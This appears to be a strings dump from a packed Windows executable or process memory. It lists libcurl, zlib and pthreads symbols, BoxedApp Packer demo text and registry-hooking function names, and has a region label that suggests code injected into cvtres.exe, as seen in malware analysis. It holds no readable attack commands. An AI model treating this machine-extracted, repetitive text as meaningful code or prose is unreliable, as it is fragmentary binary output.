%dcurl_easy_duphandlecurl_easy_escapecurl_easy_getinfocurl_easy_pausecurl_easy_recvcurl_easy_sendcurl_easy_strerrorcurl_easy_unescapecurl_escapecurl_formaddcurl_formfreecurl_formgetcurl_freecurl_getdatecurl_getenvcurl_global_cleanupcurl_global_init_memcurl_maprintfcurl_mfprintfcurl_mprintfcurl_msnprintfcurl_msprintfcurl_multi_add_handlecurl_multi_assigncurl_multi_cleanupcurl_multi_fdsetcurl_multi_info_readcurl_multi_initcurl_multi_performcurl_multi_remove_handlecurl_multi_setoptcurl_multi_socketcurl_multi_socket_actioncurl_multi_socket_allcurl_multi_strerrorcurl_multi_timeoutcurl_multi_waitcurl_mvaprintfcurl_mvfprintfcurl_mvprintfcurl_mvsnprintfcurl_mvsprintfcurl_share_cleanupcurl_share_initcurl_share_setoptcurl_share_strerrorcurl_strequalcurl_strnequalcurl_unescapecurl_version_infoADVAPI32.DLLWS2_32.DLLzlib1.dll8 8$8(8,8082 2$2(2,2024282DllMainCRTStartupGNU C 4.2.1-sjlj (mingw32-2)/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.cDllMainCRTStartup@12dllcrt1.c.filehttp.cftp.curl.c_Curl_docurl_fnmatch.cftplistparser.chttp_chunks.chttp_digest.ccurl_rand.chttp_negotiate.ctftp.cssh.ccurl_addrinfo.ccurl_sspi.ccurl_memrchr.csmtp.ccurl_threads.ccurl_rtmp.ccurl_gethostname.chttp_proxy.ccurl_gssapi.ccurl_ntlm.ccurl_ntlm_wb.ccurl_ntlm_core.ccurl_ntlm_msgs.ccurl_sasl.ccurl_schannel.ccurl_multibyte.ccurl_darwinssl.cpipeline.c.idata$7.idata$5.idata$48.idata$6.idata$4(.idata$4,.idata$44.idata$40.idata$4.idata$7`.idata$7\.idata$7l.idata$4.idata$7x.idata$6|.idata$6T.idata$7|.idata$7d.idata$7t.idata$6d.idata$6D.idata$64.idata$7h.idata$7p.idata$6l.idata$6$.idata$2P.idata$5|.idata$4$.idata$6(.idata$6P.idata$60.idata$68.idata$2(.idata$4`.idata$6h.idata$4L.idata$6\.idata$5@.idata$7(.idata$5P.idata$7H.idata$5p.idata$6t.idata$7D.idata$5l.idata$5<.idata$4@.idata$4H.idata$6,.idata$5.idata$4l.idata$4T.idata$7<.idata$5d.idata$74.idata$5\.idata$6<.idata$4<.idata$5D.idata$7,.idata$5T.idata$5,.idata$4x.idata$5$.idata$4p.idata$78.idata$5`.idata$6H.idata$4h.idata$5(.idata$4t.idata$7.idata$5H.idata$7@.idata$5h.idata$6`.idata$70.idata$5X.idata$4X.idata$58.idata$4D.idata$4P.idata$50.idata$4|.idata$7$.idata$5L.idata$4\.idata$4d.idata$7L.idata$5t.idata$54.idata$2<.idata$5x.idata$7P.idata$6p.idata$7T.idata$2.idata$7X.idata$6X.idata$6.idata$2d.debug_aranges.debug_pubnames.debug_info.debug_abbrev.debug_line.debug_frame.debug_loc_DllMainCRTStartup@12_curlx_tvdiff_curlx_tvdiff_secs_Curl_tvlong_curlx_tvnow_Curl_base64_encode_Curl_base64_decode_Curl_num_addresses_Curl_resolv_unlock_Curl_hostcache_clean_Curl_hostcache_destroy_Curl_mk_dnscache_Curl_hostcache_prune_Curl_cache_addr_Curl_loadhostpairs_Curl_resolv_Curl_resolv_timeout_Curl_printable_address_Curl_global_host_cache_dtor_Curl_global_host_cache_init_Curl_pgrsSetDownloadCounter_Curl_pgrsSetUploadCounter_Curl_pgrsSetDownloadSize_Curl_pgrsSetUploadSize_Curl_pgrsResetTimesSizes_Curl_pgrsStartNow_Curl_pgrsUpdate_Curl_pgrsDone_Curl_pgrsTime_Curl_formclean_curl_formfree_Curl_FormInit_Curl_formpostheader_Curl_FormReader_Curl_getformdata_curl_formget_curl_formadd_Curl_cookie_freelist_Curl_cookie_clearall_Curl_cookie_clearsess_Curl_cookie_cleanup_Curl_cookie_list_Curl_cookie_getlist_Curl_cookie_add_Curl_cookie_init_Curl_cookie_loadfiles_Curl_flush_cookies_http_should_fail_Curl_add_buffer_init_http_getsock_do_use_http_1_1_Curl_add_buffer_checkhttpprefix_Curl_checkheaders_Curl_compareheader_http_perhapsrewind_Curl_http_auth_act_Curl_http_done_Curl_http_connect_Curl_add_bufferf_Curl_add_timecondition_Curl_add_custom_headers_Curl_add_buffer_send_Curl_http_input_auth_Curl_http_output_auth_Curl_http_Curl_http_readwrite_headers_Curl_write_Curl_debug_Curl_read_Curl_read_plain_Curl_sendf_Curl_failf_Curl_client_write_Curl_recv_plain_Curl_send_plain_Curl_write_plain_Curl_infof_Curl_freeset_Curl_init_userdefined_Curl_protocol_getsock_Curl_doing_getsock_Curl_protocol_connecting_Curl_protocol_doing_Curl_reset_reqproto_Curl_do_more_Curl_verboseconnect_Curl_isPipeliningEnabled_IsPipeliningPossible_parse_remote_port_Curl_open_Curl_protocol_connect_Curl_connected_proxy_Curl_setup_conn_Curl_removeHandleFromPipeline_Curl_getoff_all_pipelines_Curl_addHandleToPipeline_signalPipeClose_Curl_disconnect_Curl_done_Curl_handler_dummy_Curl_connect_Curl_setopt_Curl_close_Curl_dupset_Curl_if_is_interface_name_Curl_if2ip_Curl_speedcheck_Curl_speedinit_curl_version_info_curl_version_curl_getenv_curl_free_Curl_urldecode_curl_easy_unescape_curl_unescape_curl_easy_escape_curl_escape_curl_msnprintf_curl_mvfprintf_curl_mvprintf_curl_mvsprintf_curl_mfprintf_curl_mprintf_curl_msprintf_curl_mvaprintf_curl_maprintf_curl_mvsnprintf_Curl_parsenetrc_Curl_initinfo_Curl_getinfo_Curl_single_getsock_Curl_sleep_time_Curl_posttransfer_strlen_url_strcpy_url_Curl_setup_transfer_Curl_meets_timecondition_Curl_reconnect_request_Curl_follow_Curl_pretransfer_Curl_readrewind_Curl_retry_request_Curl_fillreadbuffer_Curl_readwrite_curl_strnequal_curl_strequal_Curl_easy_addmulti_curl_easy_send_curl_easy_recv_curl_easy_pause_Curl_easy_initHandleData_curl_easy_reset_curl_easy_duphandle_curl_easy_getinfo_curl_easy_cleanup_curl_easy_perform_curl_easy_setopt_curl_global_cleanup_curl_global_init_curl_easy_init_curl_global_init_mem_Curl_fnmatch_Curl_fileinfo_dtor_Curl_fileinfo_alloc_Curl_wildcard_dtor_Curl_wildcard_init_Curl_httpchunk_init_Curl_httpchunk_read_Curl_strtok_r_Curl_persistconninfo_Curl_socket_Curl_closesocket_Curl_getconnectinfo_Curl_timeleft_Curl_sndbufset_Curl_connecthost_Curl_updateconninfo_Curl_is_connected_Curl_llist_alloc_Curl_llist_insert_next_Curl_llist_remove_Curl_llist_destroy_Curl_llist_count_Curl_llist_move_Curl_hash_pick_Curl_hash_str_Curl_hash_start_iterate_Curl_hash_next_element_Curl_str_key_compare_Curl_hash_clean_with_criterium_Curl_hash_delete_Curl_hash_clean_Curl_hash_destroy_Curl_hash_add_Curl_hash_init_Curl_hash_alloc_fd_key_compare_multi_freeamsg_Curl_multi_pipeline_enabled_Curl_multi_handlePipeBreak_Curl_multi_set_easy_connection_Curl_multi_max_host_connections_Curl_multi_max_total_connections_Curl_multi_max_pipeline_length_Curl_multi_content_length_penalty_size_Curl_multi_chunk_length_penalty_size_Curl_multi_pipelining_site_bl_Curl_multi_pipelining_server_bl_curl_multi_assign_Curl_expire_Curl_multi_process_pending_handles_curl_multi_timeout_curl_multi_fdset_curl_multi_setopt_curl_multi_info_read_curl_multi_cleanup_curl_multi_perform_curl_multi_socket_all_curl_multi_socket_action_curl_multi_socket_curl_multi_wait_curl_multi_remove_handle_curl_multi_add_handle_curl_multi_init_Curl_unencode_cleanup_Curl_unencode_gzip_write_Curl_unencode_deflate_write_curl_share_init_Curl_share_lock_Curl_share_unlock_curl_share_cleanup_curl_share_setopt_Curl_digest_cleanup_Curl_output_digest_Curl_input_digest_Curl_MD5_init_Curl_MD5_update_Curl_MD5_final_Curl_md5it_Curl_rand_Curl_srand_Curl_inet_pton_curl_easy_strerror_curl_multi_strerror_curl_share_strerror_Curl_strerror_Curl_ipvalid_Curl_ipv4_resolve_r_Curl_getaddrinfo_Curl_set_dns_servers_Curl_inet_ntop_Curl_gmtime_curl_getdate_Curl_wait_ms_Curl_poll_Curl_socket_check_Curl_clone_ssl_config_Curl_free_ssl_config_Curl_ssl_config_matches_Curl_splay_Curl_splayinsert_KEY_NOTUSED.17658_Curl_splaygetbest_Curl_splayremovebyaddr_Curl_blockread_all_Curl_SOCKS5_Curl_SOCKS4_Curl_raw_toupper_Curl_raw_equal_Curl_raw_nequal_Curl_strntoupper_Curl_freeaddrinfo_Curl_he2ai_Curl_ip2addr_Curl_str2addr_curl_slist_append_curl_slist_free_all_Curl_slist_duplicate_curlx_nonblock_Curl_memrchr_curlx_ultous_curlx_ultouc_curlx_ultosi_curlx_uztosi_curlx_uztoul_curlx_uztoui_curlx_sltosi_curlx_sltoui_curlx_sltous_curlx_uztosz_curlx_sotouz_curlx_sztosi_curlx_sitouz_curlx_sktosi_curlx_sitosk_Curl_HMAC_init_Curl_HMAC_update_Curl_HMAC_final_Curl_gethostnamehttp_negotiate_sspi.c_Curl_proxyCONNECT_Curl_proxy_connect_Curl_sasl_cleanup_Curl_sasl_create_login_message_sasl_digest_get_key_value_Curl_sasl_create_digest_md5_message_Curl_sasl_create_cram_md5_message_Curl_sasl_create_plain_message_Curl_bundle_remove_conn_Curl_bundle_add_conn_Curl_bundle_destroy_Curl_bundle_create_Curl_conncache_find_first_connection_Curl_conncache_foreach_Curl_conncache_remove_conn_Curl_conncache_find_bundle_Curl_conncache_add_conn_Curl_conncache_destroy_Curl_conncache_init_print_pipeline_Curl_pipeline_set_server_blacklist_Curl_pipeline_server_blacklisted_Curl_pipeline_set_site_blacklist_Curl_pipeline_site_blacklisted_Curl_move_handle_from_send_to_recv_pipe_Curl_add_handle_to_pipeline_Curl_pipeline_penalized.weak.__Jv_RegisterClasses.___gcc_register_frame__libmsvcrt_a_iname_Curl_handler_http___crt_xl_start_____crt_xi_start_____crt_xi_end___Curl_crealloc_Curl_cfree_Curl_HMAC_MD5_Curl_wkday___crt_xp_start___Curl_handler_file___crt_xp_end____head_libmsvcrt_a_Curl_ccalloc___crt_xc_end_____crt_xc_start___Curl_DIGEST_MD5_Curl_cmalloc_Curl_month_Curl_cstrdup___crt_xt_start___Curl_cwcsdup___crt_xt_end___Curl_ack_eintr0`.data0@.bss%XQIb%dQIb%DQIb%xQIblibgcc_s_dw2-1.dll\QUSEREX.DLLpthread_key_createpthread_key_delete7(8.898?8_CRT_MT___w64_mingwthr_add_key_dtor___w64_mingwthr_remove_key_dtor__mingwthr_key_t__mingwthr_keyGNU C 4.5.2../mingw/dllcrt1.cC:\MinGW\msys\1.0\src\mingwrt-DllMainCRTStartup@12__report_error../mingw/crtst.c__mingwthr_run_key_dtorskeypnew_keyprev_keycur_keykey_dtor_listc:/mingw/bin/../lib/gcc/mingw32/4.5.2/includecrtst.ccygming-crtbegin.c.tls$AAA.tls$ZZZ.CRT$XLA.CRT$XLZ.CRT$XLC.CRT$XLD.CRT$XDA.CRT$XDZ.idata$6N.idata$6j.idata$62.idata$6V.idata$6~.idata$6*.idata$6f.idata$6@.idata$6>cygming-crtend.c__CRT_MT.eh_frame.debug_pubtypes.debug_str.debug_ranges_pthread_key_create_pthread_key_delete_ptw32_processTerminate.part.1_pthread_join___report_error___mingwthr_run_key_dtors_key_dtor_list____w64_mingwthr_add_key_dtor____w64_mingwthr_remove_key_dtor.text.startup.ctors.65535.weak.___register_frame_info.___gcc_register_frame_ptw32_selfThreadKey_ptw32_cleanupKey.weak.___deregister_frame_info.___gcc_register_framedeflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adlerbinflate 1.2.8 Copyright 1995-2013 Mark Adler%9X9i9z9"@"@"@"@This EXE is created by the demo version of BoxedApp PackerVisit our web-site at: http://boxedapp.com/boxedapppacker/order.htmlWBoxedAppLog_%d.txtBoxedAppVar:ExeFileNameBoxedAppVar:ExeFileExtensionBoxedAppVar:ExeFileNameWithoutExtensionBoxedAppVar:ExeFullPathBoxedAppVar:OldCmdLineHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_CURRENT_CONFIGHKEY_USERS%s\%s%s\winsxs\tempBxDir\virtualAsm:\tempManifest.manifest%s_%.8x_%.8x_%.8x\KernelBase.dll\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll%d-%d-%p:\TLSSupport310D39B571B74d36B95451DD240D8758",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper\rundll32.exe"DotNetAppDomainManager.CManagedHostBoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1DotNetAppDomainManager.CAppDomainManager.config.manifest",BoxedAppSDK_AttachMixedBitnessProcessHelperAttempt to launch not executable file:Unable to find appropriate template execomdlg32.dll\dllhost.exehh.exefind.exehelp.exewinver.exeregsvr32.exedllhost.exentvdm.exetcpsvcs.exempr.dllWadvapi32.dllsxs.dllObtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html%s_%.8x_%.8x%s_%.8xboxedapp_msg_processboxedapp_event_newmsgboxedapp_msg_globalbxsdk64.dll:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\\DosDevices\pipe\\Device\NamedPipe\\??\pipe\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificatespublicKeyTokenSoftware\Microsoft\Windows\CurrentVersion\SideBySide\Winners\!"#$%&'()* ,-./0123456789:;<=>?@3, 3, 5, 0BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.BoxedAppSDK.dll\libcurl-4.dll !"#$%&'()* ,-./0123456789:pthreadgc2.dll\pthreadgc2.dll POSIX Threads for Windows LPGL2, 9, 1, 0pthreadGC2.DLLhttp://sourceware.org/pthreads-win32/\zlib1.dll For more information visit http://www.zlib.net/cvtres.exe_3500_rwx_00B20000_000AE000:
.text`.rdata@.data.rsrc@.relocl$D9.tOFTPSWu$D TryCreateProcessForVirtualEXE, template exe found:CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0xCBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0xCBoxedAppCore::My_NtFlushKey, KeyHandle = 0xCBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0xCBoxedAppCore::My_NtQueryKey, KeyHandle =CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0xKernelBase.dllkernel32.dll0x%x%xCBoxedAppCore::My_NtCreateKey, ObjectAttributes = 'CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0xC62E2B35-E4B3-4019-A7C4-F50AC7F78470CBoxedAppCore::My_NtLoadKey, DestinationKeyName = 'CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0xCBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = 'CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0xCBoxedAppCore::My_NtUnloadKey, DestinationKeyName = 'CBoxedAppCore::My_NtRenameKey, KeyHandle =BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart: Can't create process of rundll32.exe, last error =BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelperBoxedAppSDK_AttachMixedBitnessProcessHelperBoxedAppSDK_EnumVirtualRegKeysABoxedAppSDK_EnumVirtualRegKeysWBoxedAppSDK_ExecuteDotNetApplicationABoxedAppSDK_ExecuteDotNetApplicationWBoxedAppSDK_DeleteVirtualRegKeyByHandleBoxedAppSDK_DeleteVirtualRegKeyWBoxedAppSDK_DeleteVirtualRegKeyABoxedAppSDK_CreateVirtualRegKeyWBoxedAppSDK_CreateVirtualRegKeyA{4F95F74C-9713-4181-ACDD-8A50195FBC0F}BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelperBoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelperCBoxedAppCore::My_NtLoadKey2, DestinationKeyName = 'CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0xCBoxedAppCore::My_NtSaveKey, KeyHandle = 0x:\VirtualDllWithSameImport.dll:\VirtualDllWithTls.dllVirtualDllWithTls.dllVirtualDllWithSameImport.dllole32.dllWinExecadvapi32.dllNtRenameKeyNtUnloadKeyNtSetValueKeyNtSetInformationKeyNtSaveKeyNtRestoreKeyNtReplaceKeyNtQueryValueKeyNtQueryMultipleValueKeyNtQueryKeyNtOpenKeyExNtOpenKeyNtNotifyChangeKeyNtLoadKey2NtLoadKeyNtFlushKeyNtEnumerateValueKeyNtEnumerateKeyNtDeleteValueKeyNtDeleteKeyNtCreateKeyntdll.dll[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]FILE_EXECUTEGENERIC_EXECUTEKEY_WOW64_64KEYKEY_WOW64_32KEYKEY_NOTIFYKEY_CREATE_LINKKEY_ENUMERATE_SUB_KEYSKEY_CREATE_SUB_KEYKEY_SET_VALUEKEY_QUERY_VALUESECTION_MAP_EXECUTEPAGE_EXECUTE_WRITECOPYPAGE_EXECUTE_READWRITEPAGE_EXECUTE_READPAGE_EXECUTESTATUS_PRIMARY_TRANSPORT_CONNECT_FAILEDSTATUS_LOCAL_USER_SESSION_KEYSTATUS_NULL_LM_PASSWORDSTATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXESTATUS_CARDBUS_NOT_SUPPORTEDSTATUS_INVALID_PORT_ATTRIBUTESSTATUS_PORT_MESSAGE_TOO_LONGSTATUS_PORT_DISCONNECTEDSTATUS_PORT_CONNECTION_REFUSEDSTATUS_INVALID_PORT_HANDLESTATUS_PORT_ALREADY_SETSTATUS_EAS_NOT_SUPPORTEDSTATUS_CTL_FILE_NOT_SUPPORTEDSTATUS_WRONG_PASSWORDSTATUS_ILL_FORMED_PASSWORDSTATUS_PASSWORD_RESTRICTIONSTATUS_PASSWORD_EXPIREDSTATUS_FLOAT_DENORMAL_OPERANDSTATUS_FLOAT_INVALID_OPERATIONSTATUS_PIPE_NOT_AVAILABLESTATUS_INVALID_PIPE_STATESTATUS_PIPE_BUSYSTATUS_PIPE_DISCONNECTEDSTATUS_PIPE_CLOSINGSTATUS_PIPE_CONNECTEDSTATUS_PIPE_LISTENINGSTATUS_NOT_SUPPORTEDSTATUS_PIPE_EMPTYSTATUS_WRONG_PASSWORD_CORESTATUS_PIPE_BROKENSTATUS_DISK_OPERATION_FAILEDSTATUS_KEY_DELETEDSTATUS_KEY_HAS_CHILDRENSTATUS_NO_USER_SESSION_KEYSTATUS_PASSWORD_MUST_CHANGESTATUS_PORT_UNREACHABLESTATUS_LOGIN_TIME_RESTRICTIONSTATUS_LOGIN_WKSTA_RESTRICTIONSTATUS_UNSUPPORTED_COMPRESSIONSTATUS_NO_USER_KEYSSTATUS_NOT_EXPORT_FORMATSTATUS_TRANSPORT_FULLSTATUS_WMI_NOT_SUPPORTEDSTATUS_SAM_NEED_BOOTKEY_PASSWORDSTATUS_SAM_NEED_BOOTKEY_FLOPPYSTATUS_STRONG_CRYPTO_NOT_SUPPORTEDSTATUS_NOT_SUPPORTED_ON_SBSSTATUS_CSS_KEY_NOT_PRESENTSTATUS_CSS_KEY_NOT_ESTABLISHEDSTATUS_NO_KERB_KEYSTATUS_UNSUPPORTED_PREAUTHSTATUS_PORT_NOT_SETSTATUS_INVALID_IMPORT_OF_NON_DLLSTATUS_SMARTCARD_NO_KEY_CONTAINERSTATUS_SMARTCARD_NO_CERTIFICATESTATUS_SMARTCARD_NO_KEYSETSTATUS_SMARTCARD_CERT_REVOKEDSTATUS_SMARTCARD_CERT_EXPIREDSTATUS_SXS_KEY_NOT_FOUNDSTATUS_CLUSTER_JOIN_IN_PROGRESSSTATUS_CLUSTER_JOIN_NOT_IN_PROGRESSRegDeleteKeyExWNtRequestWaitReplyPortNtConnectPortNtReplyPortNtCompleteConnectPortNtAcceptConnectPortNtReplyWaitReceivePortNtCreateWaitablePortImported function,.data.idataIt's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULLIt's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStreamIt's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULLBoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeysNtEnumerateKey() returned unexpected error, status =, RegTree::IEnumKeyNode::GetNext() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys, RegTree::IKeyNode::EnumKeys() failed, hr =: RegTree::IEnumKeyNode::GetNext() failed, hr =: GetAllChildsKeys() failed, status =BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal: RegTree::IKeyNode::EnumKeys() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPatherror, IVirtualKeyHandle_GetFullPath() returnedInvalid key information class:KeySetHandleTagsInformation is not supported for virtual handleKeySetDebugInformation is not supported for virtual handleKeySetVirtualizationInformation is not supported for virtual handleKeyControlFlagsInformation is not supported for virtual handleKeyWow64FlagsInformation is not supported for virtual handleWe still don't process NtQueryObject / ObjectBasicInformation for virtual key handlesWe still don't process NtQueryObject / ObjectTypeInformation for virtual key handles: IVirtualKeyHandle::Rename() failed, hr =: RegTree::IKeyNode::Remove() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal: RegTree::IKeyNode::AddKey() failed, hr =: result hkey =: IVirtualKey::CreateKey() failed, hr =: we can't create a virtual key with its own behavior under another virtual key: Handles::CreateVirtualKeyHandle() failed, hr =: IVirtualKey::OpenKey() failed, hr =: RegImpl::CreateKeyOnSharedMem() failed, hr =: GetFullRegKeyPath() failed for the hKey =: Handles::IVirtualKeyHandle::CreateKey() failed and returned: passed pBehavior is not NULL, but parent key is virtual, so we can't create a keyBoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey: lpSubKey: "BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey: Handles::CreateVirtualKeyHandle() failedBoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal: SearchStartingFromRealKey() failed: RegTree::IKeyNode::FindValue() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal: IVirtualKeyHandle::put_Value() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime: NtQueryKey() failed, status =: NtOpenKey() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys: NtEnumerateValueKey() failed when we tried to get name of the node, status =: IKeyNode::EnumValues() failed, hr =: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternalBoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal: invalid KeyInformationClass passed:: IVirtualKeyHandle_GetFullPath() failed, hr =: Behavior::IEnumVirtualKey::GetNext() failed, hr =: IVirtualKeyHandle::EnumValues() failed, hr =: IVirtualKeyHandle::EnumKeys() failed, hr =: IVirtualKeyHandle::get_LastWriteTime() failed, hr =reg:NtQueryMultipleValueKey(: IKeyNode::FindValue() failed, hr =: IVirtualKeyHandle::get_Value() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal: IVirtualKeyHandle::get_ValueType() failed, hr =reg:NtSetInformationKey(RegTree::IKeyNode::RemoveValue() failed, hrBoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternalreg:NtRenameKey(RegTree::IEnumKeyNode::GetNext(), hr =RegTree::IKeyNode::EnumKeys(), hr =: IEnumVirtualKey::GetNext() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternalreg:NtDeleteValueKey(: NtEnumerateKey() failed when we tried to get name of the node, status =, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =, Behavior::IVirtualKey::OpenKey() failed, hr =: IKeyNode::EnumKeys() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternalreg:NtEnumerateValueKey(reg:NtQueryKey(reg:NtQueryValueKey(reg:NtSetValueKey(reg:NtCreateKey(reg:NtDeleteKey(reg:NtEnumerateKey(reg:NtOpenKey(GetProcessHeapGetWindowsDirectoryWKERNEL32.dllUSER32.dllRegCloseKeyRegOpenKeyExWRegDeleteKeyWRegOpenKeyWADVAPI32.dllOLEAUT32.dllbxsdk32.dlld:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb`.rsrcv2.0.50727BoxedAppSDK_AppDomainManager.dllSystem.Security.ctorSystem.Security.PolicySystem.ReflectionSystem.Runtime.InteropServicesSystem.DiagnosticsSystem.Runtime.CompilerServicesSystem.CollectionsSystem.Security.PermissionsSystem.IODllImportAttributeshell32.dlllpCmdLine1.0.0.0$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdbmscoree.dllBoxedAppSDKThunk32.dlld:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb.relocTLSSupport32.dlld:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb9 9$9(9,9094!40484}4:$:,:5:::{:?#?2?9?@?1 1$1(1,10141819$=(=,=0=4=8=<=@=6 6$6(6,6064686<6@61"26233'44 40454:4:":2:7:>;,10141818 8$8(8,8%s_%.8x_%.8x_%.8x\KernelBase.dll\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll%d-%d-%p:\TLSSupport310D39B571B74d36B95451DD240D8758",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper\rundll32.exe"DotNetAppDomainManager.CManagedHostBoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1DotNetAppDomainManager.CAppDomainManager.config.manifest",BoxedAppSDK_AttachMixedBitnessProcessHelperAttempt to launch not executable file:Unable to find appropriate template execomdlg32.dll\dllhost.exehh.exefind.exehelp.exewinver.exeregsvr32.exedllhost.exentvdm.exetcpsvcs.exempr.dllWadvapi32.dllsxs.dllObtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html%s_%.8x_%.8x%s_%.8xboxedapp_msg_processboxedapp_event_newmsgboxedapp_msg_globalbxsdk64.dll:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\\DosDevices\pipe\\Device\NamedPipe\\??\pipe\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows 